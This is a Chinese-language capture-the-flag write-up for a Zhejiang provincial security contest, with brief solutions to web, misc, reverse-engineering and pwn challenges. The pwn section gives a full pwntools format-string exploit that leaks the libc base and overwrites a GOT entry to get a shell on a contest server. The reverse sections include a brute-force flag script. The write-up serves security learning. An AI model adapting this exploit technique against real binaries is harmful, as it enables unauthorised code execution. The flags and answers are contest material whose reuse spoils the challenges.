浙江省网络安全大赛
ch1pppppppp
第一嘻嘻嘻
web
石庆数码
打开网页点击GOBACK
打开F12里面就有
眼疾手快
打开网页
看js
var clicks=0
$(function() {
$("#cookie")
.mousedown(function() {
$(this).width('350px').height('350px');
})
.mouseup(function() {
$(this).width('375px').height('375px');
clicks++;
$("#clickcount").text(clicks);
if(clicks >= 1000000){
var form = $('');
$('body').append(form);
form.submit();
}
});
});
在控制台
然后点击一下就好了
你追我赶
misc
躲躲藏藏
把图片下载下来
binwalk一下里面有zip
binwalk -e 一下就可以解压
就可以看到了xls
把xls的文件格式的头改成doc
可以找到
zjctf{GFDGFA_GGDFFXXFFA_GGADXG_DFDGDGFAFA_GGDFFXXF}
圆盘解密一下就好了
pwn
一夫当关
简单的格式化字符串漏洞,直接给exp:
#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
local = 0
if local:
cn = process('./59XeYrdIHL')
bin = ELF('./59XeYrdIHL')
else:
cn = remote('sec4.hdu.edu.cn',9999)
bin = ELF('./59XeYrdIHL')
def z(a=''):
gdb.attach(cn,a)
if a == '':
raw_input()
buf = '0x%08lx'
cn.sendline(buf)
lbase = int(cn.recvline()[:-1],16) - 0x3C4963
print('lbase: ' +hex(lbase))
a = ((lbase + 0x45216) & 0xff0000) >> 16
b = (lbase + 0x45216) & 0xffff
buf ='%' +str(a)+'x'+'%12$hhn'
buf+='%'+ str(b - a) + 'x'+'%13$hn'
buf = buf.ljust(32,'a')
buf+= p64(0x601018+2)
buf+= p64(0x601018)
cn.sendline(buf)
cn.interactive()
re
逆向逆向
在IDA中分析程序逻辑,不难发现是一个base32加密(去掉了末尾的=进行隐藏),把结果字符串加上被去掉的四个‘=’拖到在线decode网站解密得到flag
加密应用
将apk解压,将得到的dex文件转成jar拖进jd-gui,看到如下函数
package com.example.ctf;
import java.util.Vector;
public class a
{
int[] aa = { 57, 60, 80, 113, 64, 57, 74, 79, 75, 55, 59, 68, 78, 69, 55, 61, 57, 59, 62, 74, 68, 63, 60, 62, 69, 59, 72, 68, 74, 69, 67, 68, 55, 115, 63 };
int[] bb = { 1190700, 733784, 659883, 1390032, 656600, 2723220, 632949, 608400, 930852, 1140624, 861258, 1105425, 699867, 1215808, 547658, 689472, 515450, 833508, 670453, 680823, 1072512, 699840, 614169, 719415, 894348, 632100, 942391, 1008600, 895279, 566150, 1065456, 751389, 836294, 1174212, 2937500 };
public boolean a(String paramString)
{
if (paramString.length() != this.aa.length) {
return false;
}
Vector localVector = new Vector();
int i = 0;
if (i >= paramString.length()) {
if (localVector.size() == this.aa.length) {
i = 0;
}
}
for (;;)
{
if (i >= localVector.size())
{
return true;
if (((paramString.charAt(i) < 'A') || (paramString.charAt(i) > 'Z')) && (paramString.charAt(i) != '{') && (paramString.charAt(i) != '}')) {
return false;
}
localVector.add(Integer.valueOf(paramString.charAt(i)));
i += 1;
break;
}
if (Math.pow(((Integer)localVector.get(i)).intValue(), 3.0D) + Math.pow(((Integer)localVector.get(i)).intValue(), 2.0D) * this.aa[i] != this.bb[i]) {
return false;
}
i += 1;
}
}
}
发现可以爆破,脚本如下
import string
aa = [57, 60, 80, 113, 64, 57, 74, 79, 75, 55, 59, 68, 78, 69, 55, 61, 57, 59, 62, 74, 68, 63, 60, 62, 69, 59, 72, 68, 74, 69, 67, 68, 55, 115, 63]
bb = [1190700, 733784, 659883, 1390032, 656600, 2723220, 632949, 608400, 930852, 1140624, 861258, 1105425, 699867, 1215808, 547658, 0xA8540, 515450, 833508, 670453, 680823, 0x105D80, 699840, 614169, 719415, 894348, 632100, 942391, 1008600, 895279, 566150, 0x1041F0, 751389, 836294, 1174212, 2937500]
flag = ''
for i in range(len(aa)):
for j in string.printable:
if(pow(ord(j),3) + pow(ord(j),2) * aa[i] == bb[i]):
flag += j
break
print(flag)